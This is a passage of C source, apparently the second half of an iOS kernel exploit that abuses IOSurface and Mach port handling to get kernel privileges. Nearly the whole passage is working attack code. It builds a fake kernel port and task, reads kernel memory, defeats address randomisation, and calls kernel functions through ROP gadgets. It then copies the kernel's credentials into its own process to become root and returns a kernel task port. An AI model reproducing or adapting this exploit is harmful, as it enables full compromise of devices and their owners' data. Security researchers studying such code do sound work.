  677. IOConnectCallAsyncStructMethod(client, 17, realport, &ref, 1, in, sizeof(in), NULL, NULL);
  678. IOConnectCallAsyncStructMethod(client, 17, port, &ref, 1, in, sizeof(in), NULL, NULL);
  679. LOG("herp derp");
  680. usleep(300000);
  681. sched_yield();
  682. ret = mach_ports_register(self, &client, 1); // gonna use that later
  683. LOG("mach_ports_register: %s", mach_error_string(ret));
  684. if(ret != KERN_SUCCESS)
  685. {
  686. goto out;
  687. }
  688. LOG("herp derp mcgerp");
  689. usleep(300000);
  690. // Prevent cleanup
  691. fakeport = port;
  692. port = MACH_PORT_NULL;
  693. // Release port with ool port refs
  694. RELEASE_PORT(stuffport);
  695. sched_yield();
  696. ret = my_mach_zone_force_gc(host);
  697. if(ret != KERN_SUCCESS)
  698. {
  699. LOG("mach_zone_force_gc: %s", mach_error_string(ret));
  700. goto out;
  701. }
  702. LOG("herp derp bajerp");
  703. usleep(300000);
  704. for(uint32_t i = 0; i < NUM_DATA; ++i)
  705. {
  706. dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(i);
  707. kport_t *dptr = (kport_t*)&dict[5];
  708. for(size_t j = 0; j < DATA_SIZE / sizeof(kport_t); ++j)
  709. {
  710. *(((volatile uint32_t*)&dptr[j].ip_context) + 1) = 0x10000000 | i;
  711. #ifdef __LP64__
  712. *(volatile uint32_t*)&dptr[j].ip_messages.port.pad = 0x20000000 | i;
  713. *(volatile uint32_t*)&dptr[j].ip_lock.pad = 0x30000000 | i;
  714. #endif
  715. }
  716. uint32_t dummy = 0;
  717. size = sizeof(dummy);
  718. ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict, sizeof(dict), &dummy, &size);
  719. if(ret != KERN_SUCCESS)
  720. {
  721. LOG("setValue(%u): %s", i, mach_error_string(ret));
  722. goto out;
  723. }
  724. }
  725. uint64_t ctx = 0xffffffff;
  726. ret = my_mach_port_get_context(self, fakeport, &ctx);
  727. LOG("mach_port_get_context: 0x%016llx, %s", ctx, mach_error_string(ret));
  728. if(ret != KERN_SUCCESS)
  729. {
  730. goto out;
  731. }
  732. uint32_t shift_mask = ctx >> 60;
  733. if(shift_mask < 1 || shift_mask > 3)
  734. {
  735. LOG("Invalid shift mask.");
  736. goto out;
  737. }
  738. uint32_t shift_off = sizeof(kport_t) - (((shift_mask - 1) * 0x1000) % sizeof(kport_t));
  739. uint32_t idx = (ctx >> 32) & 0xfffffff;
  740. dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(idx);
  741. uint32_t request[] =
  742. {
  743. // Same header
  744. surface.data.id,
  745. 0x0,
  746. transpose(idx), // Key
  747. 0x0, // Null terminator
  748. };
  749. kport_t kport =
  750. {
  751. .ip_bits = 0x80000000, // IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE
  752. .ip_references = 100,
  753. .ip_lock =
  754. {
  755. .type = 0x11,
  756. },
  757. .ip_messages =
  758. {
  759. .port =
  760. {
  761. .receiver_name = 1,
  762. .msgcount = MACH_PORT_QLIMIT_KERNEL,
  763. .qlimit = MACH_PORT_QLIMIT_KERNEL,
  764. },
  765. },
  766. .ip_srights = 99,
  767. };
  768. // Note to self: must be `(uintptr_t)&dict[5] + DATA_SIZE` and not `ptr + DATA_SIZE`.
  769. for(uintptr_t ptr = (uintptr_t)&dict[5] + shift_off, end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
  770. {
  771. UNALIGNED_COPY(&kport, ptr, sizeof(kport_t));
  772. }
  773. ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
  774. LOG("reallocate_buf: %s", mach_error_string(ret));
  775. if(ret != KERN_SUCCESS)
  776. {
  777. goto out;
  778. }
  779. LOG("herp derp fasherp");
  780. usleep(300000);
  781. // Register realport on fakeport
  782. mach_port_t notify = MACH_PORT_NULL;
  783. //XXX: dies here a lot
  784. ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, realport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
  785. LOG("mach_port_request_notification(realport): %x, %s", notify, mach_error_string(ret));
  786. if(ret != KERN_SUCCESS)
  787. {
  788. goto out;
  789. }
  790. uint32_t response[4 + (DATA_SIZE / sizeof(uint32_t))] = { 0 };
  791. size = sizeof(response);
  792. ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
  793. LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
  794. if(ret != KERN_SUCCESS)
  795. {
  796. goto out;
  797. }
  798. if(size < DATA_SIZE + 0x10)
  799. {
  800. LOG("Response too short.");
  801. goto out;
  802. }
  803. uint32_t fakeport_off = -1;
  804. kptr_t realport_addr = 0;
  805. for(uintptr_t ptr = (uintptr_t)&response[4] + shift_off, end = (uintptr_t)&response[4] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
  806. {
  807. kptr_t val = UNALIGNED_KPTR_DEREF(&((kport_t*)ptr)->ip_pdrequest);
  808. if(val)
  809. {
  810. fakeport_off = ptr - (uintptr_t)&response[4];
  811. realport_addr = val;
  812. break;
  813. }
  814. }
  815. if(!realport_addr)
  816. {
  817. LOG("Failed to leak realport address");
  818. goto out;
  819. }
  820. LOG("realport addr: " ADDR, realport_addr);
  821. uintptr_t fakeport_dictbuf = (uintptr_t)&dict[5] + fakeport_off;
  822. // Register fakeport on itself (and clean ref on realport)
  823. notify = MACH_PORT_NULL;
  824. ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, fakeport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
  825. LOG("mach_port_request_notification(fakeport): %x, %s", notify, mach_error_string(ret));
  826. if(ret != KERN_SUCCESS)
  827. {
  828. goto out;
  829. }
  830. size = sizeof(response);
  831. ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
  832. LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
  833. if(ret != KERN_SUCCESS)
  834. {
  835. goto out;
  836. }
  837. if(size < DATA_SIZE + 0x10)
  838. {
  839. LOG("Response too short.");
  840. goto out;
  841. }
  842. kptr_t fakeport_addr = UNALIGNED_KPTR_DEREF(&((kport_t*)((uintptr_t)&response[4] + fakeport_off))->ip_pdrequest);
  843. if(!fakeport_addr)
  844. {
  845. LOG("Failed to leak fakeport address");
  846. goto out;
  847. }
  848. LOG("fakeport addr: " ADDR, fakeport_addr);
  849. kptr_t fake_addr = fakeport_addr - fakeport_off;
  850. kport_request_t kreq =
  851. {
  852. .notify =
  853. {
  854. .port = 0,
  855. }
  856. };
  857. kport.ip_requests = fakeport_addr + ((uintptr_t)&kport.ip_context - (uintptr_t)&kport) - ((uintptr_t)&kreq.name.size - (uintptr_t)&kreq);
  858. UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
  859. ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
  860. LOG("reallocate_buf: %s", mach_error_string(ret));
  861. if(ret != KERN_SUCCESS)
  862. {
  863. goto out;
  864. }
  865. #define KREAD(addr, buf, len) \
  866. do \
  867. { \
  868. for(size_t i = 0; i < ((len) + sizeof(uint32_t) - 1) / sizeof(uint32_t); ++i) \
  869. { \
  870. ret = my_mach_port_set_context(self, fakeport, (addr) + i * sizeof(uint32_t)); \
  871. if(ret != KERN_SUCCESS) \
  872. { \
  873. LOG("mach_port_set_context: %s", mach_error_string(ret)); \
  874. goto out; \
  875. } \
  876. mach_msg_type_number_t outsz = 1; \
  877. ret = mach_port_get_attributes(self, fakeport, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)((uint32_t*)(buf) + i), &outsz); \
  878. if(ret != KERN_SUCCESS) \
  879. { \
  880. LOG("mach_port_get_attributes: %s", mach_error_string(ret)); \
  881. goto out; \
  882. } \
  883. } \
  884. } while(0)
  885. kptr_t itk_space = 0;
  886. KREAD(realport_addr + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &itk_space, sizeof(itk_space));
  887. LOG("itk_space: " ADDR, itk_space);
  888. if(!itk_space)
  889. {
  890. goto out;
  891. }
  892. kptr_t self_task = 0;
  893. KREAD(itk_space + off->ipc_space_is_task, &self_task, sizeof(self_task));
  894. LOG("self_task: " ADDR, self_task);
  895. if(!self_task)
  896. {
  897. goto out;
  898. }
  899. kptr_t IOSurfaceRootUserClient_port = 0;
  900. KREAD(self_task + off->task_itk_registered, &IOSurfaceRootUserClient_port, sizeof(IOSurfaceRootUserClient_port));
  901. LOG("IOSurfaceRootUserClient port: " ADDR, IOSurfaceRootUserClient_port);
  902. if(!IOSurfaceRootUserClient_port)
  903. {
  904. goto out;
  905. }
  906. kptr_t IOSurfaceRootUserClient_addr = 0;
  907. KREAD(IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_kobject - (uintptr_t)&kport), &IOSurfaceRootUserClient_addr, sizeof(IOSurfaceRootUserClient_addr));
  908. LOG("IOSurfaceRootUserClient addr: " ADDR, IOSurfaceRootUserClient_addr);
  909. if(!IOSurfaceRootUserClient_addr)
  910. {
  911. goto out;
  912. }
  913. kptr_t IOSurfaceRootUserClient_vtab = 0;
  914. KREAD(IOSurfaceRootUserClient_addr, &IOSurfaceRootUserClient_vtab, sizeof(IOSurfaceRootUserClient_vtab));
  915. LOG("IOSurfaceRootUserClient vtab: " ADDR, IOSurfaceRootUserClient_vtab);
  916. if(!IOSurfaceRootUserClient_vtab)
  917. {
  918. goto out;
  919. }
  920. //kptr_t slide = IOSurfaceRootUserClient_vtab - OFFSET_IOSURFACEROOTUSERCLIENT_VTAB;
  921. kptr_t slide = IOSurfaceRootUserClient_vtab - 0xfffffff006f11678; //fuck it, just hardcode this bitch for now
  922. LOG("slide: " ADDR, slide);
  923. if((slide % 0x100000) != 0)
  924. {
  925. goto out;
  926. }
  927. // Unregister IOSurfaceRootUserClient port
  928. ret = mach_ports_register(self, NULL, 0);
  929. LOG("mach_ports_register: %s", mach_error_string(ret));
  930. if(ret != KERN_SUCCESS)
  931. {
  932. goto out;
  933. }
  934. kptr_t vtab[VTAB_SIZE] = { 0 };
  935. KREAD(IOSurfaceRootUserClient_vtab, vtab, sizeof(vtab));
  936. kptr_t kbase = (vtab[off->vtab_get_retain_count] & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
  937. for(uint32_t magic = 0; 1; kbase -= KERNEL_SLIDE_STEP)
  938. {
  939. KREAD(kbase, &magic, sizeof(magic));
  940. if(magic == KERNEL_MAGIC)
  941. {
  942. break;
  943. }
  944. }
  945. LOG("Kernel base: " ADDR, kbase);
  946. #define OFF(name) (off->name + (kbase - off->base))
  947. kptr_t zone_map_addr = 0;
  948. KREAD(OFF(zone_map), &zone_map_addr, sizeof(zone_map_addr));
  949. LOG("zone_map: " ADDR, zone_map_addr);
  950. if(!zone_map_addr)
  951. {
  952. goto out;
  953. }
  954. #ifdef __LP64__
  955. vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_x0_x0_0x10);
  956. #else
  957. vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_r0_r0_0xc);
  958. #endif
  959. uint32_t faketask_off = fakeport_off < sizeof(ktask_t) ? fakeport_off + sizeof(kport_t) : 0;
  960. faketask_off = UINT64_ALIGN(faketask_off);
  961. uintptr_t faketask_buf = (uintptr_t)&dict[5] + faketask_off;
  962. ktask_t ktask;
  963. memset(&ktask, 0, sizeof(ktask));
  964. ktask.a.lock.data = 0x0;
  965. ktask.a.lock.type = 0x22;
  966. ktask.a.ref_count = 100;
  967. ktask.a.active = 1;
  968. ktask.a.map = zone_map_addr;
  969. ktask.b.itk_self = 1;
  970. UNALIGNED_COPY(&ktask, faketask_buf, sizeof(ktask));
  971. kport.ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
  972. kport.ip_kobject = fake_addr + faketask_off;
  973. kport.ip_requests = 0;
  974. kport.ip_context = 0;
  975. UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
  976. #undef KREAD
  977. ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
  978. LOG("reallocate_buf: %s", mach_error_string(ret));
  979. if(ret != KERN_SUCCESS)
  980. {
  981. goto out;
  982. }
  983. vm_prot_t cur = 0,
  984. max = 0;
  985. sched_yield();
  986. ret = mach_vm_remap(self, &shmem_addr, DATA_SIZE, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, fakeport, fake_addr, false, &cur, &max, VM_INHERIT_NONE);
  987. if(ret != KERN_SUCCESS)
  988. {
  989. LOG("mach_vm_remap: %s", mach_error_string(ret));
  990. goto out;
  991. }
  992. *(uint32_t*)shmem_addr = 123; // fault page
  993. LOG("shmem_addr: 0x%016llx", shmem_addr);
  994. volatile kport_t *fakeport_buf = (volatile kport_t*)(shmem_addr + fakeport_off);
  995. uint32_t vtab_off = fakeport_off < sizeof(vtab) ? fakeport_off + sizeof(kport_t) : 0;
  996. vtab_off = UINT64_ALIGN(vtab_off);
  997. kptr_t vtab_addr = fake_addr + vtab_off;
  998. LOG("vtab addr: " ADDR, vtab_addr);
  999. volatile kptr_t *vtab_buf = (volatile kptr_t*)(shmem_addr + vtab_off);
  1000. for(volatile kptr_t *src = vtab, *dst = vtab_buf, *end = src + VTAB_SIZE; src < end; *(dst++) = *(src++));
  1001. #define MAXRANGES 5
  1002. struct
  1003. {
  1004. uint32_t start;
  1005. uint32_t end;
  1006. } ranges[MAXRANGES] =
  1007. {
  1008. { fakeport_off, (uint32_t)(fakeport_off + sizeof(kport_t)) },
  1009. { vtab_off, (uint32_t)(vtab_off + sizeof(vtab)) },
  1010. };
  1011. size_t numranges = 2;
  1012. #define FIND_RANGE(var, size) \
  1013. do \
  1014. { \
  1015. if(numranges >= MAXRANGES) \
  1016. { \
  1017. LOG("FIND_RANGE(" #var "): ranges array too small"); \
  1018. goto out; \
  1019. } \
  1020. for(int32_t i = 0; i < numranges; ++i) \
  1021. { \
  1022. uint32_t end = var + (uint32_t)(size); \
  1023. if( \
  1024. (var >= ranges[i].start && var < ranges[i].end) || \
  1025. (end >= ranges[i].start && var < ranges[i].end) \
  1026. ) \
  1027. { \
  1028. var = UINT64_ALIGN(ranges[i].end); \
  1029. i = -1; \
  1030. } \
  1031. } \
  1032. if(var + (uint32_t)(size) > DATA_SIZE) \
  1033. { \
  1034. LOG("FIND_RANGE(" #var ") out of range: 0x%x-0x%x", var, var + (uint32_t)(size)); \
  1035. goto out; \
  1036. } \
  1037. ranges[numranges].start = var; \
  1038. ranges[numranges].end = var + (uint32_t)(size); \
  1039. ++numranges; \
  1040. } while(0)
  1041. typedef union
  1042. {
  1043. struct {
  1044. // IOUserClient fields
  1045. kptr_t vtab;
  1046. uint32_t refs;
  1047. uint32_t pad;
  1048. // Gadget stuff
  1049. kptr_t trap_ptr;
  1050. // IOExternalTrap fields
  1051. kptr_t obj;
  1052. kptr_t func;
  1053. uint32_t break_stuff; // idk wtf this field does, but it has to be zero or iokit_user_client_trap does some weird pointer mashing
  1054. // OSSerializer::serialize
  1055. kptr_t indirect[3];
  1056. } a;
  1057. struct {
  1058. char pad[OFFSET_IOUSERCLIENT_IPC];
  1059. int32_t __ipc;
  1060. } b;
  1061. } kobj_t;
  1062. uint32_t fakeobj_off = 0;
  1063. FIND_RANGE(fakeobj_off, sizeof(kobj_t));
  1064. kptr_t fakeobj_addr = fake_addr + fakeobj_off;
  1065. LOG("fakeobj addr: " ADDR, fakeobj_addr);
  1066. volatile kobj_t *fakeobj_buf = (volatile kobj_t*)(shmem_addr + fakeobj_off);
  1067. VOLATILE_ZERO(fakeobj_buf, sizeof(kobj_t));
  1068. fakeobj_buf->a.vtab = vtab_addr;
  1069. fakeobj_buf->a.refs = 100;
  1070. fakeobj_buf->a.trap_ptr = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.obj - (uintptr_t)fakeobj_buf);
  1071. fakeobj_buf->a.break_stuff = 0;
  1072. fakeobj_buf->b.__ipc = 100;
  1073. fakeport_buf->ip_bits = 0x8000001d; // IO_BITS_ACTIVE | IOT_PORT | IKOT_IOKIT_CONNECT
  1074. fakeport_buf->ip_kobject = fakeobj_addr;
  1075. // First arg to KCALL can't be == 0, so we need KCALL_ZERO which indirects through OSSerializer::serialize.
  1076. // That way it can take way less arguments, but well, it can pass zero as first arg.
  1077. #define KCALL(addr, x0, x1, x2, x3, x4, x5, x6) \
  1078. ( \
  1079. fakeobj_buf->a.obj = (kptr_t)(x0), \
  1080. fakeobj_buf->a.func = (kptr_t)(addr), \
  1081. (kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x1), (kptr_t)(x2), (kptr_t)(x3), (kptr_t)(x4), (kptr_t)(x5), (kptr_t)(x6)) \
  1082. )
  1083. #define KCALL_ZERO(addr, x0, x1, x2) \
  1084. ( \
  1085. fakeobj_buf->a.obj = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.indirect - (uintptr_t)fakeobj_buf) - 2 * sizeof(kptr_t), \
  1086. fakeobj_buf->a.func = OFF(osserializer_serialize), \
  1087. fakeobj_buf->a.indirect[0] = (x0), \
  1088. fakeobj_buf->a.indirect[1] = (x1), \
  1089. fakeobj_buf->a.indirect[2] = (addr), \
  1090. (kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x2), 0, 0, 0, 0, 0) \
  1091. )
  1092. kptr_t kernel_task_addr = 0;
  1093. int r = KCALL(OFF(copyout), OFF(kernel_task), &kernel_task_addr, sizeof(kernel_task_addr), 0, 0, 0, 0);
  1094. LOG("kernel_task addr: " ADDR ", %s, %s", kernel_task_addr, errstr(r), mach_error_string(r));
  1095. if(r != 0 || !kernel_task_addr)
  1096. {
  1097. goto out;
  1098. }
  1099. kptr_t kernproc_addr = 0;
  1100. r = KCALL(OFF(copyout), kernel_task_addr + off->task_bsd_info, &kernproc_addr, sizeof(kernproc_addr), 0, 0, 0, 0);
  1101. LOG("kernproc addr: " ADDR ", %s, %s", kernproc_addr, errstr(r), mach_error_string(r));
  1102. if(r != 0 || !kernproc_addr)
  1103. {
  1104. goto out;
  1105. }
  1106. kptr_t kern_ucred = 0;
  1107. r = KCALL(OFF(copyout), kernproc_addr + off->proc_ucred, &kern_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
  1108. LOG("kern_ucred: " ADDR ", %s, %s", kern_ucred, errstr(r), mach_error_string(r));
  1109. if(r != 0 || !kern_ucred)
  1110. {
  1111. goto out;
  1112. }
  1113. kptr_t self_proc = 0;
  1114. r = KCALL(OFF(copyout), self_task + off->task_bsd_info, &self_proc, sizeof(self_proc), 0, 0, 0, 0);
  1115. LOG("self_proc: " ADDR ", %s, %s", self_proc, errstr(r), mach_error_string(r));
  1116. if(r != 0 || !self_proc)
  1117. {
  1118. goto out;
  1119. }
  1120. kptr_t self_ucred = 0;
  1121. r = KCALL(OFF(copyout), self_proc + off->proc_ucred, &self_ucred, sizeof(self_ucred), 0, 0, 0, 0);
  1122. LOG("self_ucred: " ADDR ", %s, %s", self_ucred, errstr(r), mach_error_string(r));
  1123. if(r != 0 || !self_ucred)
  1124. {
  1125. goto out;
  1126. }
  1127. int olduid = getuid();
  1128. LOG("uid: %u", olduid);
  1129. KCALL(OFF(kauth_cred_ref), kern_ucred, 0, 0, 0, 0, 0, 0);
  1130. r = KCALL(OFF(copyin), &kern_ucred, self_proc + off->proc_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
  1131. LOG("copyin: %s", errstr(r));
  1132. if(r != 0 || !self_ucred)
  1133. {
  1134. goto out;
  1135. }
  1136. // Note: decreasing the refcount on the old cred causes a panic with "cred reference underflow", so... don't do that.
  1137. LOG("stole the kernel's credentials");
  1138. setuid(0); // update host port
  1139. int newuid = getuid();
  1140. LOG("uid: %u", newuid);
  1141. if(newuid != olduid)
  1142. {
  1143. KCALL_ZERO(OFF(chgproccnt), newuid, 1, 0);
  1144. KCALL_ZERO(OFF(chgproccnt), olduid, -1, 0);
  1145. }
  1146. host_t realhost = mach_host_self();
  1147. LOG("realhost: %x (host: %x)", realhost, host);
  1148. uint32_t zm_task_off = 0;
  1149. FIND_RANGE(zm_task_off, sizeof(ktask_t));
  1150. kptr_t zm_task_addr = fake_addr + zm_task_off;
  1151. LOG("zm_task addr: " ADDR, zm_task_addr);
  1152. volatile ktask_t *zm_task_buf = (volatile ktask_t*)(shmem_addr + zm_task_off);
  1153. VOLATILE_ZERO(zm_task_buf, sizeof(ktask_t));
  1154. zm_task_buf->a.lock.data = 0x0;
  1155. zm_task_buf->a.lock.type = 0x22;
  1156. zm_task_buf->a.ref_count = 100;
  1157. zm_task_buf->a.active = 1;
  1158. zm_task_buf->b.itk_self = 1;
  1159. zm_task_buf->a.map = zone_map_addr;
  1160. uint32_t km_task_off = 0;
  1161. FIND_RANGE(km_task_off, sizeof(ktask_t));
  1162. kptr_t km_task_addr = fake_addr + km_task_off;
  1163. LOG("km_task addr: " ADDR, km_task_addr);
  1164. volatile ktask_t *km_task_buf = (volatile ktask_t*)(shmem_addr + km_task_off);
  1165. VOLATILE_ZERO(km_task_buf, sizeof(ktask_t));
  1166. km_task_buf->a.lock.data = 0x0;
  1167. km_task_buf->a.lock.type = 0x22;
  1168. km_task_buf->a.ref_count = 100;
  1169. km_task_buf->a.active = 1;
  1170. km_task_buf->b.itk_self = 1;
  1171. r = KCALL(OFF(copyout), OFF(kernel_map), &km_task_buf->a.map, sizeof(km_task_buf->a.map), 0, 0, 0, 0);
  1172. LOG("kernel_map: " ADDR ", %s", km_task_buf->a.map, errstr(r));
  1173. if(r != 0 || !km_task_buf->a.map)
  1174. {
  1175. goto out;
  1176. }
  1177. kptr_t ipc_space_kernel = 0;
  1178. r = KCALL(OFF(copyout), IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &ipc_space_kernel, sizeof(ipc_space_kernel), 0, 0, 0, 0);
  1179. LOG("ipc_space_kernel: " ADDR ", %s", ipc_space_kernel, errstr(r));
  1180. if(r != 0 || !ipc_space_kernel)
  1181. {
  1182. goto out;
  1183. }
  1184. #ifdef __LP64__
  1185. kmap_hdr_t zm_hdr = { 0 };
  1186. r = KCALL(OFF(copyout), zm_task_buf->a.map + off->vm_map_hdr, &zm_hdr, sizeof(zm_hdr), 0, 0, 0, 0);
  1187. LOG("zm_range: " ADDR "-" ADDR ", %s", zm_hdr.start, zm_hdr.end, errstr(r));
  1188. if(r != 0 || !zm_hdr.start || !zm_hdr.end)
  1189. {
  1190. goto out;
  1191. }
  1192. if(zm_hdr.end - zm_hdr.start > 0x100000000)
  1193. {
  1194. LOG("zone_map is too big, sorry.");
  1195. goto out;
  1196. }
  1197. kptr_t zm_tmp = 0; // macro scratch space
  1198. # define ZM_FIX_ADDR(addr) \
  1199. ( \
  1200. zm_tmp = (zm_hdr.start & 0xffffffff00000000) | ((addr) & 0xffffffff), \
  1201. zm_tmp < zm_hdr.start ? zm_tmp + 0x100000000 : zm_tmp \
  1202. )
  1203. #else
  1204. # define ZM_FIX_ADDR(addr) (addr)
  1205. #endif
  1206. kptr_t ptrs[2] = { 0 };
  1207. ptrs[0] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
  1208. ptrs[1] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
  1209. LOG("zm_port addr: " ADDR, ptrs[0]);
  1210. LOG("km_port addr: " ADDR, ptrs[1]);
  1211. KCALL(OFF(ipc_kobject_set), ptrs[0], zm_task_addr, IKOT_TASK, 0, 0, 0, 0);
  1212. KCALL(OFF(ipc_kobject_set), ptrs[1], km_task_addr, IKOT_TASK, 0, 0, 0, 0);
  1213. r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
  1214. LOG("copyin: %s", errstr(r));
  1215. if(r != 0)
  1216. {
  1217. goto out;
  1218. }
  1219. mach_msg_type_number_t mapsNum = 0;
  1220. ret = mach_ports_lookup(self, &maps, &mapsNum);
  1221. LOG("mach_ports_lookup: %s", mach_error_string(ret));
  1222. if(ret != KERN_SUCCESS)
  1223. {
  1224. goto out;
  1225. }
  1226. LOG("zone_map port: %x", maps[0]);
  1227. LOG("kernel_map port: %x", maps[1]);
  1228. if(!MACH_PORT_VALID(maps[0]) || !MACH_PORT_VALID(maps[1]))
  1229. {
  1230. goto out;
  1231. }
  1232. // Clean out the pointers without dropping refs
  1233. ptrs[0] = ptrs[1] = 0;
  1234. r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
  1235. LOG("copyin: %s", errstr(r));
  1236. if(r != 0)
  1237. {
  1238. goto out;
  1239. }
  1240. mach_vm_address_t remap_addr = 0;
  1241. ret = mach_vm_remap(maps[1], &remap_addr, off->sizeof_task, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, maps[0], kernel_task_addr, false, &cur, &max, VM_INHERIT_NONE);
  1242. LOG("mach_vm_remap: %s", mach_error_string(ret));
  1243. if(ret != KERN_SUCCESS)
  1244. {
  1245. goto out;
  1246. }
  1247. LOG("remap_addr: 0x%016llx", remap_addr);
  1248. ret = mach_vm_wire(realhost, maps[1], remap_addr, off->sizeof_task, VM_PROT_READ | VM_PROT_WRITE);
  1249. LOG("mach_vm_wire: %s", mach_error_string(ret));
  1250. if(ret != KERN_SUCCESS)
  1251. {
  1252. goto out;
  1253. }
  1254. kptr_t newport = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
  1255. LOG("newport: " ADDR, newport);
  1256. KCALL(OFF(ipc_kobject_set), newport, remap_addr, IKOT_TASK, 0, 0, 0, 0);
  1257. KCALL(OFF(ipc_port_make_send), newport, 0, 0, 0, 0, 0, 0);
  1258. r = KCALL(OFF(copyin), &newport, OFF(realhost) + off->realhost_special + sizeof(kptr_t) * 4, sizeof(kptr_t), 0, 0, 0, 0);
  1259. LOG("copyin: %s", errstr(r));
  1260. if(r != 0)
  1261. {
  1262. goto out;
  1263. }
  1264. task_t kernel_task = MACH_PORT_NULL;
  1265. ret = host_get_special_port(realhost, HOST_LOCAL_NODE, 4, &kernel_task);
  1266. LOG("kernel_task: %x, %s", kernel_task, mach_error_string(ret));
  1267. if(ret != KERN_SUCCESS || !MACH_PORT_VALID(kernel_task))
  1268. {
  1269. goto out;
  1270. }
  1271. /*
  1272. if(callback)
  1273. {
  1274. ret = callback(kernel_task, kbase, cb_data);
  1275. if(ret != KERN_SUCCESS)
  1276. {
  1277. LOG("callback returned error: %s", mach_error_string(ret));
  1278. goto out;
  1279. }
  1280. }
  1281. */
  1282. *tfp0 = kernel_task;
  1283. *kslide = slide;
  1284. *kernucred = kern_ucred;
  1285. retval = KERN_SUCCESS;
  1286. out:;
  1287. LOG("Cleaning up...");
  1288. usleep(100000); // Allow logs to propagate
  1289. if(maps)
  1290. {
  1291. RELEASE_PORT(maps[0]);
  1292. RELEASE_PORT(maps[1]);
  1293. }
  1294. RELEASE_PORT(fakeport);
  1295. for(size_t i = 0; i < NUM_AFTER; ++i)
  1296. {
  1297. RELEASE_PORT(after[i]);
  1298. }
  1299. RELEASE_PORT(port);
  1300. for(size_t i = 0; i < NUM_BEFORE; ++i)
  1301. {
  1302. RELEASE_PORT(before[i]);
  1303. }
  1304. RELEASE_PORT(realport);
  1305. RELEASE_PORT(stuffport);
  1306. RELEASE_PORT(client);
  1307. my_mach_zone_force_gc(host);
  1308. if(shmem_addr != 0)
  1309. {
  1310. _kernelrpc_mach_vm_deallocate_trap(self, shmem_addr, DATA_SIZE);
  1311. shmem_addr = 0;
  1312. }
  1313. // Pass through error code, if existent
  1314. if(retval != KERN_SUCCESS && ret != KERN_SUCCESS)
  1315. {
  1316. retval = ret;
  1317. }
  1318. return retval;
  1319. }